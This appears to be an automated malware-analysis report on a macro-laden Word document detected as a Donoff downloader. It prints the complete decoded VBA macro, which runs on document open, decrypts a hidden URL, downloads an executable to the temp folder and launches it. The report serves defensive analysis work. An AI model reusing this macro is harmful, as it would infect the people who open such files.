MALICIOUS
258
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Donoff-6700491-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal dQOIbXuPpuqCFUqrAKFjyQlE As Long, ByVal zoTdechR As String, _ -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1757 bytes |
SHA-256: 77c76e7ed1155da08975437878ecb99f66830722fd1a3e38e8320fccca2b647a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: LcIOiqfKGGEJvo
Private Declare PtrSafe Function pnUJeULYkSR Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal ubvAIye As Long, ByVal nnm As String, _
ByVal rNUcGTSjmphF As String, ByVal UNxgiCfkxudqPP As String, ByVal rzMoHnLdDdoiAkG As String, ByVal qBHDOg As Long) As Long
Private Declare PtrSafe Function WSHcSJWhQPDpQnzNvMyC Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal dQOIbXuPpuqCFUqrAKFjyQlE As Long, ByVal zoTdechR As String, _
ByVal KRwJIYdfWwL As String, ByVal DoVXsUZnyMZMzbxvXFWIM As Long, ByVal nMXRkhEZyrnyPeznxUPt As Long) As Long
Private Sub LcIOiqfKGGEJvo()
Dim JkjzpsjIlQOwlFvmAKt As String, tggHPdEYDctF As String, urlDAWGRXTfwxSUeBi As String, vZAmBFIAYChQMBVL As String, CQbJJwjKht As String, HpGswVKHBT As String
tggHPdEYDctF = Decrypt("fyf/opd")
urlDAWGRXTfwxSUeBi = Environ$("tmp") & "\" & tggHPdEYDctF
JkjzpsjIlQOwlFvmAKt = Decrypt("1>me@fyf/wpi0iu1q66l4so:b:oz0t0npd/ypcqpse/xxx00;tquui")
WSHcSJWhQPDpQnzNvMyC 0, JkjzpsjIlQOwlFvmAKt, urlDAWGRXTfwxSUeBi, 0, 0
pnUJeULYkSR 0, "open", urlDAWGRXTfwxSUeBi, "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()
LcIOiqfKGGEJvo
End Sub
Private Function Decrypt(enc)
Dim x, i, tmp
enc = StrReverse(enc)
For i = 1 To Len(enc)
x = Mid(enc, i, 1)
tmp = tmp & Chr(Asc(x) - 1)
Next
Decrypt = tmp
End Function
Attribute VB_Name = "NewMacros"
Sub autopen()
'
' autopen Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.